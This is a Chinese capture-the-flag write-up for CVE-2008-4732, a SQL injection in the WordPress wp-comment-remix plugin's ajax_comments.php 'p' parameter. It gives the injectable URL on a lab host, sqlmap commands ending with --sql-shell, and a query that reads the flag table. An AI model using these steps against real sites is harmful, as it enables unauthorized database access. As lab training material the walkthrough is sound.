春秋云境CVE-2008-4732

1.阅读靶场介绍

这里可以得到的就是这个ajax_comments.php

这个插件的p参数存在sql注入

简单来说就是

ajax_comments.php?p=xxx

这样的形式可以sql注入

2.启动靶场

得到如下所示的页面

3.poc

构造如下url

https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1

我们可以得到如下页面

接下来就是复制url

然后启动sqlmap

执行一下语句

sqlmap.py -u https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1 --batch

如下所示

一直直到它查出来存在sql注入时

如下所示

我们可以再执行如下命令

sqlmap.py -u https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1 --batch --sql-shell

如下所示

最后就是去查询flag

执行下述命令

select * from flag

到此我们就完成夺旗了

文章也接近尾声了

感谢各位花费宝贵的时间来观看我的文章

相关推荐
数据知道35 分钟前
邮件安全实战:SPF/DKIM/DMARC 配置与钓鱼绕过
网络·安全·web安全·网络安全·邮件安全
qizayaoshuap1 小时前
# [特殊字符] 密码生成器 — 鸿蒙ArkTS安全算法与密码强度评估系统
java·算法·安全·华为·harmonyos
金伟API10242 小时前
常见的SQL面试题:经典50例
数据库·人工智能·笔记·sql·学习
是Yu欸3 小时前
AI跨模态鉴伪技术实测
人工智能·安全·ai作画·aigc·合合信息·ai-native·waic
William Dawson4 小时前
【华为云 MRS Redis 安全集群 Kerberos 认证接入实战(Spring Boot \+ Jedis)】
redis·安全·华为云
盟接之桥4 小时前
为制造而生:制造业EDI如何重塑全球连接力
网络·安全·低代码·汽车·制造
世界尽头与你4 小时前
Android Root 检测原理
android·安全·网络安全·渗透测试
kp000004 小时前
如何平衡模型输出的“有用性”和“安全性
人工智能·安全·网络安全·信息安全·ai安全
长风2304 小时前
Day 18:自动备份和恢复自定义UI —— 构建Dashboard自动恢复脚本
人工智能·安全
Qianyunzhiyun4 小时前
AWS根用户MFA怎么设置?新账号安全教程
安全·云计算·aws